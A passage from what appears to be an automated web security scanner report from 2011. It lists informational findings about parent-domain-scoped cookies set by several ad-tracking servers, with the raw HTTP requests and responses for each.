Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

10.8. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1268392-317325-1198035-1049794-1238051-74560-1086373-1196055-1264419-593881-1215295-1086372-1086371-1086370-926097-1086369-1196051-1147048-1049851-1063912-1063916-1166710-1063911-1063910-1215322-715901-1023315-725071-109108-75921-1006093-86237-1006089-1049785-1086731-1049788-1086733-1284585-1044410-1077940-1093100-397181-1044578-1041270-1049769-596293-1049770-576685-1044587-596291-1049772 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=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; rsiPus_j6zu="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SkQn="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 15:38:32 GMT

GIF89a.............!.......,...........D..;

10.9. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_8DRJ=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; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GcbX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRCK="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9HMAYU1O2uQ6agQvHto2eq75IgYszgol7C7yspOc4TfCNog8fILX1SZNuyWxzrk3bzeF6RGNscLYiwwBuw5NglDbetEfHtRcFfcl95ic8yRof2oFa5L4JiQC5IaPGHVkT8GhVZ6xGeKni8NUrqKZmMAbiWsBL5UqdRbeZWToN2eg35zKeZFE02LRKzRNVXYBaa7ppkin1O9btPO6IpX68HbfkWmpxgC4rHlrQY5cih+4vFJ1yVKrNm1UsfyrQhoN1blLBVwvH7W15DdRx7AaRM+ZZsCpxf/q6821H93ulpjwedebCruCq9asXpjc3DnsSQj7rG8huZjfR5xtcyxQahF2J7aH/2RX/uwdJCqIaniRV2csxWeQDj1fYtS3LNaV5ambGum1vzYLMxBPNmdpaPS3YuuEFo4bRMtvsaWX2jD8l0O2uPJqFc1djo5/PC6TG91f37068lORbaSfLef0W9hEk+CLtpU5tIrab1g+Uhul1ETrwsFT0LsMOY7aSo1dto9gzHV1YWhgzvNPEpgmj8e/XkgtE0UFN5RbNm/yynf67Saka70ChSZUc/7F44ZxFTlNqvlId7qFlScwzwQ3zjBt1Evu1Wa6mFZSpnlDXYJaOAhPbK3QTUFPa0ulhL3Cb1rjnWB1w6IsjgXw/W04kH5Txss4xPzgXwcND/0/ZUUgAwA6zXnKWEzvICHdNGxNJB9eZzLjAp+RyLbbm8SG5i04Zm8SEF74RcB42ruBeveVRMto7o9hgrCILt3XYgejpjOHhs49ESuaKo/Mdtc4cvUatGmevM5e5UpVlcekb+gcB4zrxChd/qkCAANSUEUFYnM+n5PkikYD7SR5ekqXY1WLE1QFPGd4RdmUbRCEpKms/T90zg/75Mku6hMWLVEOHJjLsitzKuQPXZnaUKS/zn0v5ea/NbfsTjmjkmMyZ1L5L9gN2SssLQ67MHgZktcYkdXIaxkH/BQUXnj90Y0/dINaOjffbX1j8G4+JNN595YSF8C1OsLkhw7BCyyf7EmjbOGEpQCKRB5qYULcNklZ/1XQV03z4vs7NHKTNfZfWzXxMkzFwyCfZIsGydPLXTwRhsXGYrpq8ACJGAh512uOGHZSQTWSTg4xq8LTJoPrBr4l8PIsYYr6x/pF8KyJL5kcO0E2HqAKcwO1STKii+39WPDkYEafWF4om3Wl+Y4Ky3Hg6xGMXDzrBbaAgKJISziuVyk3GPOaoJUC636sgg3wb2SRVMYepf5bKCD/rosaKat34VF+1hrUCOGJ5iqDruocSVkDTqFKSWJMOJxfNyE3eQoOkxsWQLGzwVCVlHxz1GWhIH4NvpmYjAybIBqGdzob6P8ea5H4lf0I/wPKA/bxPafUtNWX6zmIJIFEP5Tt4xtEmM8clJeiqkQvX3Wb7jV9jBBipcWGFVoA6TT5EKvvRA94UPWVxCYNa6+w7M50HP2s9T2yuy62c/JPJ9GQfvJv00eejh8lPviVx4/wfwB4XMKqmZ91cTdahvWbdmf0Ezw7o034/atITXt+kj"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 1630

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.10. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d887938/3/500004862365/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d887938/3/500004862365/decide.php?ord=1304955586 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:03 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Sun, 09 May 2010 15:40:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1; expires=Fri, 29 Jun 2012 07:40:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-y]y(M-0; expires=Fri, 29-Jun-2012 07:40:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.11. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304955323.101,wait-%3E10000,&1304955323232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

10.12. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25746

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...

10.13. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13933&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
